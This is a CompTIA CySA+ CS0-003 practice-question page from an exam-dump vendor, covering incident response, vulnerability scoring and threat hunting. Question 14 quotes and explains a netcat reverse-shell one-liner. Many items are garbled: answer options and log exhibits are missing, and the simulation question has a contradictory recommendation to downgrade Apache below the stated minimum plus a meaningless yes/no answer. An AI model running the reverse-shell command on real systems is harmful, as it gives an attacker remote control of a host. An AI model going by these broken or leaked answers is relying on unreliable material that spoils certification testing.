CS0-003 Practice
CS0-003 Practice
Get the Full CS0-003 dumps in VCE and PDF From SurePassExam
https://www.surepassexam.com/CS0-003-exam-dumps.html (167 New Questions)
CompTIA
Exam Questions CS0-003
CompTIA CySA+ Certification Exam
NEW QUESTION 1
A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the
following controls would best all ow the organization to identity rogue
devices more quickly?
Answer: A
Explanation:
The best control to allow the organization to identify rogue devices more quickly is A. Implement a continuous monitoring policy. A continuous monitoring policy is a
set of procedures and tools that enable an organization to detect and respond to unauthorized or anomalous activities on its network in real time or near real time.
A continuous monitoring policy can help identify rogue access points as soon as they appear on the network, rather than waiting for quarterly or monthly scans. A
continuous monitoring policy can also help improve the overall security posture and compliance of the organization by providing timely and accurate information
about its network assets, vulnerabilities, threats, and incidents1.
NEW QUESTION 2
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security
services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host.
Which of the following data sources would most likely reveal evidence of the root cause?
(Select two).
Answer: BC
Explanation:
Registry artifacts and EDR data are two data sources that can provide valuable information about the root cause of a malware outbreak. Registry artifacts can
reveal changes made by the malware to the system configuration, such as disabling security services, modifying startup items, or creating persistence
mechanisms1. EDR data can capture the behavior and network activity of the malware, such as the initial infection vector, the command and control
communication, or the lateral movement2. These data sources can help the analyst identify the malware family, the attack technique, and the threat actor behind
the outbreak.
References: Malware Analysis | CISA, Malware Analysis: Steps & Examples - CrowdStrike
NEW QUESTION 3
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the
network and remain inside of it for an extended period of time.
Which of the following techniques should be performed to meet the CISO's goals?
A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty
Answer: B
Explanation:
The correct answer is B. Adversary emulation.
Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs) of a specific threat actor or group to test the
effectiveness of the security controls and incident response capabilities of an organization1. Adversary emulation can help identify and address the gaps and
weaknesses in the security posture of an organization, as well as improve the readiness and skills of the security team. Adversary emulation can also help
measure the dwell time, which is the duration that a threat actor remains undetected inside the network2.
The other options are not the best techniques to meet the CISO’s goals. Vulnerability scanning (A) is a technique that involves scanning the network and systems
for known vulnerabilities, but it does not simulate a real attack or test the incident response capabilities. Passive discovery © is a technique that involves collecting
information about the network and systems without sending any packets or probes, but it does not identify or exploit any vulnerabilities or test the security controls.
Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and reporting vulnerabilities in an organization’s systems or
applications, but it does not focus on a specific threat actor or group.
NEW QUESTION 4
A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the
following:
Which of the following are most likely occurring, based on the MFA logs? (Select two).
A. Dictionary attack
B. Push phishing
C. impossible geo-velocity
D. Subscriber identity module swapping
E. Rogue access point
F. Password spray
Answer: BC
Explanation:
C. Impossible geo-velocity: This is an event where a single user's account is accessed from different geographical locations within a timeframe that is impossible
for normal human travel. In the log, we can see that the user "jdoe" is accessing from the United States and then within a few minutes from Russia, which is
practically impossible to achieve without the use of some form of automated system or if the account credentials are being used by different individuals in different
locations.
* B. Push phishing: This could also be an indication of push phishing, where the user is tricked into approving a multi-factor authentication request that they did not
initiate. This is less clear from the logs directly, but it could be inferred if the user is receiving MFA requests that they are not initiating and are being approved
without their genuine desire to access the resources.
NEW QUESTION 5
An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that
the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does
this describe?
A. Delivery
B. Command and control
C. Reconnaissance
D. Weaporization
Answer: B
Explanation:
The Command and Control stage of the Cyber Kill Chain describes the communication between the attacker and the compromised system. The attacker may use
this channel to send commands, receive data, or update malware. If the analyst discovers unusual outbound connections to an IP that was previously blocked, it
may indicate that the attacker has established a command and control channel and bypassed the security controls. ReferencesC: yber Kill Chain® | Lockheed
Martin
NEW QUESTION 6
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
Answer: A
Explanation:
The best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach is to determine the
sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest
in cybersecurity topics. Determining the sophistication of the audience can help tailor the
report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level,
and business-oriented than a report for technical staff or peers.
NEW QUESTION 7
SIMULATION
You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers
and recommend changes if you find they are not
The company's hardening guidelines indicate the following
• TLS 1 2 is the only version of TLS running.
• Apache 2.4.18 or greater should be used.
• Only default ports should be used.
INSTRUCTIONS
using the supplied data. record the status of compliance With the company’s guidelines for each server.
The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for Issues based ONLY on the hardening guidelines
provided.
Part 1: AppServ1:
AppServ2:
AppServ3:
AppServ4:
Part 2:
Solution:
Part 1:
Part 2:
Based on the compliance report, I recommend the following changes for each server: AppServ1: No changes are needed for this server.
AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption and communication between clients and the server.
Update Apache from version 2.4.17 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs.
AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure compatibility and stability with the company’s applications
and policies. Change the port number from 8080 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid
any confusion or conflicts with other services.
AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs. Change the port number from
8443 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other
services.
A. Yes
B. No
Answer: A
NEW QUESTION 8
Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the
environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the
improvement?
Answer: A
Explanation:
Mean time to detect (MTTD) is a metric that measures how quickly an organization can identify a security incident or a malicious actor in the environment.
Reducing MTTD can improve visibility and reporting of threats, as well as prevent lateral movement and data exfiltration by detecting them sooner.
NEW QUESTION 9
An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a
secure template. Which of the following is the best resource to ensure secure configuration?
A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001
Answer: A
Explanation:
The best resource to ensure secure configuration of cloud infrastructure is A. CIS Benchmarks. CIS Benchmarks are a set of prescriptive configuration
recommendations for various technologies, including cloud providers, operating systems, network devices, and server software. They are developed by a global
community of cybersecurity experts and help organizations protect their systems against threats more confidently1 PCI DSS, OWASP Top Ten, and ISO 27001
are also important standards for information security, but they are not focused on providing specific guidance for hardening cloud infrastructure. PCI DSS is a
compliance scheme for payment card transactions, OWASP Top Ten is a list of common web application security risks, and ISO 27001 is a framework for
establishing and maintaining an information security management system. These standards may have some relevance for cloud security, but they are not as
comprehensive and detailed as CIS Benchmarks
NEW QUESTION 10
A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber
Kill Chain does this act exhibit?
A. Reconnaissance
B. Weaponization
C. Exploitation
D. Installation
Answer: B
Explanation:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a
malicious payload to use against a target. In this case, the disgruntled open-source developer has created a logic bomb that will act as a wiper, which is a type of
malware that destroys data on a system. This is an example of weaponization, as the developer has prepared a cyberweapon to sabotage the code repository.
References: The answer was based on the web search results from Bing, especially the following sources:
? Cyber Kill Chain® | Lockheed Martin, which states: “In the weaponization step, the
adversary creates remote access malware weapon, such as a virus or worm, tailored to one or more vulnerabilities.”
? The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which
states: “In the weaponization stage, all of the attacker’s preparatory work culminates in the creation of malware to be used against an identified target.”
? What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states:
“Weaponization: The attacker creates a malicious payload that will be delivered to the target.”
NEW QUESTION 11
Which of the following statements best describes the MITRE ATT&CK framework?
Answer: D
Explanation:
The MITRE ATT&CK framework is a knowledge base of cybercriminals’ adversarial behaviors based on cybercriminals’ known tactics, techniques and
procedures (TTPs). It helps security teams model, detect, prevent and fight cybersecurity threats by simulating cyberattacks, creating security policies, controls
and incident response plans, and sharing information with other security professionals. It is an open-source project that evolves with input from a global community
of cybersecurity professionals1. References: What is the MITRE ATT&CK Framework? | IBM
NEW QUESTION 12
Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?
A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.
Answer: B
NEW QUESTION 13
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be
checked first?
Answer: B
Explanation:
The NTP configuration on each system should be checked first, as it is essential for ensuring accurate and consistent time stamps across different systems. NTP
is the Network Time Protocol, which is used to synchronize the clocks of computers over a network. NTP uses a hierarchical system of time sources, where each
level is assigned a stratum number. The most accurate time sources, such as atomic clocks or GPS receivers, are at stratum 0, and the devices that synchronize
with them are at stratum 1, and so on. NTP clients can query multiple NTP servers and use algorithms to select the best time source and adjust their clocks
accordingly1. If the NTP configuration is not consistent or correct on each system, the time stamps of the logs and events may differ, making it difficult to correlate
incidents across different systems. This can affect the security analysis and correlation of events, as well as the compliance and auditing of the network23.
References: How the Windows Time Service Works, Time Synchronization - All You Need To Know, What is SIEM? | Microsoft Security
NEW QUESTION 14
A security analyst detected the following suspicious activity:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?
A. Network pivoting
B. Host scanning
C. Privilege escalation
D. Reverse shell
Answer: D
Explanation:
The command rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f is a one-liner that creates a reverse shell from the target machine to
the attacker’s machine. It does the following steps:
•rm -f /tmp/f deletes any existing file named /tmp/f
•mknod /tmp/f p creates a named pipe (FIFO) file named /tmp/f
•cat /tmp/f|/bin/sh -i 2>&1 reads from the pipe and executes the commands using /bin/sh in interactive mode, redirecting the standard error to the standard output
•nc 10.0.0.1 1234 > tmp/f connects to the attacker’s machine at IP address 10.0.0.1 and port 1234 using netcat, and writes the output to the pipe
This way, the attacker can send commands to the target machine and receive the output through the netcat connection, effectively creating a reverse shell.
References Hack the Galaxy
Reverse Shell Cheat Sheet
NEW QUESTION 15
Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance
Answer: A
Explanation:
An SLA (Service Level Agreement) is a contract or agreement between a service provider and a customer that defines the expected level of service, performance,
quality, and availability of the service. An SLA also specifies the responsibilities, obligations, and penalties for both parties in case of non-compliance or breach of
the agreement. An SLA can help organizations to ensure that their security services are delivered in a timely and effective manner, and that any security incidents
or vulnerabilities are addressed and resolved within a specified time frame. An SLA can also help to establish clear communication, expectations, and
accountability between the service provider and the customer12
An MOU (Memorandum of Understanding) is a document that expresses a mutual agreement or understanding between two or more parties on a common goal or
objective. An MOU is not legally binding, but it can serve as a basis for future cooperation or collaboration. An MOU may not be suitable for requiring remediation
of a known threat within a given time frame, as it does not have the same level of enforceability, specificity, or measurability as an SLA.
Best-effort patching is an informal and ad hoc approach to applying security patches or updates to systems or software. Best-effort patching does not follow any
defined process, policy, or schedule, and relies on the availability and discretion of the system administrators or users. Best-effort patching may not be effective or
efficient for requiring remediation of a known threat within a given time frame, as it does not guarantee that the patches are applied correctly, consistently, or
promptly. Best-effort patching may also introduce new risks or vulnerabilities due to human error, compatibility issues, or lack of testing. Organizational governance
is the framework of rules, policies, procedures, and processes that guide and direct the activities and decisions of an organization. Organizational governance can
help to establish the roles, responsibilities, and accountabilities of different stakeholders within the organization, as well as the goals, values, and principles that
shape the organizational culture and behavior. Organizational governance can also help to ensure compliance with internal and external standards, regulations,
and laws. Organizational governance may not be sufficient for requiring remediation of a known threat within a given time frame, as it does not specify the details
or metrics of the service delivery or performance. Organizational governance may also vary depending on the size, structure, and nature of the organization.
NEW QUESTION 16
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this
threat. Which of the following security controls would best support the company in this scenario?
Answer: B
Explanation:
The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness.
Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as
the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and
encourage employees to report any incidents or violations of information security.
NEW QUESTION 17
A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high
amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to
prove whether this server was experiencing this behavior?
A. Nmap
B. TCPDump
C. SIEM
D. EDR
Answer: B
Explanation:
TCPDump is the best tool to prove whether the server was experiencing a DoS attack related to half-open TCP sessions consuming memory. TCPDump is a
command-line tool that can capture and analyze network traffic, such as TCP, UDP, and ICMP packets. TCPDump can help the administrator to identify the source
and destination of the traffic, the TCP flags and sequence numbers, the packet size and frequency, and other information that can indicate a DoS attack. A DoS
attack related to half-open TCP sessions is also known as a SYN flood attack, which is a type of volumetric attack that aims to exhaust the network bandwidth or
resources of the target server by sending a large amount of TCP SYN requests and ignoring the TCP SYN-ACK responses. This creates a backlog of half-open
connections on the server, which consume memory and CPU resources, and prevent legitimate connections from being established12. TCPDump can help the
administrator to detect a SYN flood attack by looking for a high number of TCP SYN packets with different source IP addresses, a low number of TCP SYN-ACK
packets, and a very low number of TCP ACK packets34. References: SYN flood DDoS attack | Cloudflare, What is a SYN flood attack and how to prevent it? |
NETSCOUT, TCPDump - A Powerful Tool for Network Analysis and Security, How to Detect a SYN Flood Attack with TCPDump
NEW QUESTION 18
Which of the following does "federation" most likely refer to within the context of identity and access management?
A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user
D. Correlating one's identity with the attributes and associated applications the user has access to
Answer: B
Explanation:
Federation is a system of trust between two parties for the purpose of authenticating users and conveying information needed to authorize their access to
resources. By using federation, a user can use one set of credentials to access multiple domains that trust each other.
NEW QUESTION 19
A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:
Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H Vulnerability 3:
CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L
Which of the following vulnerabilities should be patched first?
A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerability 4
Answer: A
NEW QUESTION 20
A technician is analyzing output from a popular network mapping tool for a PCI audit:
Answer: C
Explanation:
The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites.
Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the
cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least
strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure
cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and
insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that
should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites. The other descriptions are not accurate, as they
do not reflect what the output shows. The host is not up or responding is incorrect, as the output clearly shows that the host is up and responding to the scan. The
host is running excessive cipher suites is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. The
Secure Shell port on this host is closed is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The
output only shows information about port 443, which is the default port for HTTPS.
NEW QUESTION 21
During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the
network while preserving evidence?
A. Run a packet sniffer to monitor traffic to and from the access point.
B. Connect to the access point and examine its log files.
C. Identify who is connected to the access point and attempt to find the attacker.
D. Disconnect the access point from the network
Answer: D
Explanation:
The correct answer is D. Disconnect the access point from the network.
A rogue access point is a wireless access point that has been installed on a network without the authorization or knowledge of the network administrator. A rogue
access point can pose a serious security risk, as it can allow unauthorized users to access the network, intercept network traffic, or launch attacks against the
network or its devices1234.
The first action that should be taken to protect the network while preserving evidence is to disconnect the rogue access point from the network. This will prevent
any further damage or compromise of the network by blocking the access point from communicating with other devices or users. Disconnecting the rogue access
point will also preserve its state and configuration, which can be useful for forensic analysis and investigation. Disconnecting the rogue access point can be done
physically by unplugging it from the network port or wirelessly by disabling its radio frequency5.
The other options are not the best actions to take first, as they may not protect the network or preserve evidence effectively.
Option A is not the best action to take first, as running a packet sniffer to monitor traffic to and from the access point may not stop the rogue access point from
causing harm to the network. A packet sniffer is a tool that captures and analyzes network packets, which are units of data that travel across a network. A packet
sniffer can be useful for identifying and troubleshooting network problems, but it may not be able to prevent or block malicious traffic from a rogue access point.
Moreover, running a packet sniffer may require additional time and resources, which could delay the response and mitigation of the incident5.
Option B is not the best action to take first, as connecting to the access point and examining its log files may not protect the network or preserve evidence.
Connecting to the access point may expose the analyst’s device or credentials to potential attacks or compromise by the rogue access point. Examining its log
files may provide some information about the origin and activity of the rogue access point, but it may also alter or delete some evidence that could be useful for
forensic analysis and investigation. Furthermore, connecting to the access point and examining its log files may not prevent or stop the rogue access point from
continuing to harm the network5.
Option C is not the best action to take first, as identifying who is connected to the access point and attempting to find the attacker may not protect the network or
preserve evidence. Identifying who is connected to the access point may require additional tools or techniques, such as scanning for wireless devices or analyzing
network traffic, which could take time and resources away from responding and mitigating the incident. Attempting to find the attacker may also be difficult or
impossible, as the attacker may use various methods to hide their identity or location, such as encryption, spoofing, or proxy servers. Moreover, identifying who is
connected to the access point and attempting to find the attacker may not prevent or stop the rogue access point from causing further damage or compromise to
the network5.
References:
? 1 CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
? 2 Cybersecurity Analyst+ - CompTIA
? 3 CompTIA CySA+ CS0-002 Certification Study Guide
? 4 CertMaster Learn for CySA+ Training - CompTIA
? 5 How to Protect Against Rogue Access Points on Wi-Fi - Byos
? 6 Wireless Access Point Protection: 5 Steps to Find Rogue Wi-Fi Networks …
? 7 Rogue Access Point - Techopedia
? 8 Rogue access point - Wikipedia
? 9 What is a Rogue Access Point (Rogue AP)? - Contextual Security
NEW QUESTION 22
Which of the following is a nation-state actor least likely to be concerned with?
Answer: D
Explanation:
A nation-state actor is a group or individual that conducts cyberattacks on behalf of a government or a political entity. They are usually motivated by national
interests, such as espionage, sabotage, or influence operations. They are often highly skilled, resourced, and persistent, and they operate with the protection or
support of their state sponsors. Therefore, they are less likely to be concerned with the forensic analysis for legal action of their actions, as they are unlikely to face
prosecution or extradition in their own country or by international law. They are more likely to be concerned with the detection by the MITRE ATT&CK framework,
which is a knowledge base of adversary tactics and techniques based on real-world observations. The MITRE ATT&CK framework can help defenders identify,
prevent, and respond to cyberattacks by nation-state actors.
They are also likely to be concerned with the detection or prevention of reconnaissance activities, which are the preliminary steps of cyberattacks that involve
gathering information about the target, such as vulnerabilities, network topology, or user credentials. Reconnaissance activities can expose the presence, intent,
and capabilities of the attackers, and allow defenders to take countermeasures. Finally, they are likely to be concerned with the examination of their actions and
objectives, which can reveal their motives, strategies, and goals, and help defenders understand their threat profile and attribution.
References:
? 1: MITRE ATT&CK®
? 2: What is the MITRE ATT&CK Framework? | IBM
? 3: MITRE ATT&CK | MITRE
? 4: Cyber Forensics Explained: Reasons, Phases & Challenges of Cyber Forensics
| Splunk
? 5: Digital Forensics: How to Identify the Cause of a Cyber Attack - G2
NEW QUESTION 23
A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise
workstations, the following host details are aggregated:
Which of the following actions should the hunter perform first based on the details above?
Answer: C
Explanation:
The first step should be to perform a public search for malware reports on taskhw.exe, as this file is suspicious for several reasons: it is located in a non-standard
path, it has a high CPU usage, it is signed by an unknown entity, and it is only present on one host. A public search can help to determine if this file is a known
malware or a legitimate program. If it is malware, the hunter can then take appropriate actions to remove it and prevent further damage. The other options are
either premature or ineffective, as they do not provide enough information to assess the threat level of
taskhw.exe. References: Cybersecurity Analyst+ - CompTIA, taskhw.exe Windows process
- What is it? - file.net, Taskhostw.exe - What Is Taskhostw.exe & Is It Malware? - MalwareTips Forums
NEW QUESTION 24
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan
against a corporate network to evaluate which devices were operating in the environment. Given the following output:
A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
Answer: E
Explanation:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used
to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The
presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the
network. Official References: https://github.com/mame82/P4wnP1_aloa
NEW QUESTION 25
An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies
regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?
A. Creating a playbook denoting specific SLAs and containment actions per incident type
B. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs
C. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders
D. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks
Answer: B
Explanation:
Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs is the best action to address the
reporting issue. Reporting SLAs are service level agreements that specify the time frame and the format for notifying the relevant authorities and the affected
individuals of a data breach. Reporting SLAs may vary depending on the type and severity of the breach, the type and location of the data, the industry and
jurisdiction of the organization, and the internal policies of the organization. By researching and documenting the reporting SLAs for different scenarios, the
organization can ensure that it complies with the legal and ethical obligations of data breach notification, and avoid any penalties, fines, or lawsuits that may result
from failing to report a breach in a timely and appropriate manner12. References: When and how to report a breach: Data breach reporting best practices, Incident
and Breach Management
NEW QUESTION 26
After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows
11 users have constant issues. Which of the
following did the change management team fail to do?
A. Implementation
B. Testing
C. Rollback
D. Validation
Answer: B
Explanation:
Testing is a crucial step in any change management process, as it ensures that the change is compatible with the existing systems and does not cause any errors
or disruptions. In this case, the change management team failed to test the email client patch on Windows 11 devices, which resulted in a widespread issue for the
users. Testing would have revealed the problem before the patch was deployed, and allowed the team to fix it or postpone the change.
References: 7 Reasons Why Change Management Strategies Fail and How to Avoid Them, CompTIA CySA+ CS0-003 Certification Study Guide
NEW QUESTION 27
......
* CS0-003 Most Realistic Questions that Guarantee you a Pass on Your FirstTry
* CS0-003 Practice Test Questions in Multiple Choice Formats and Updatesfor 1 Year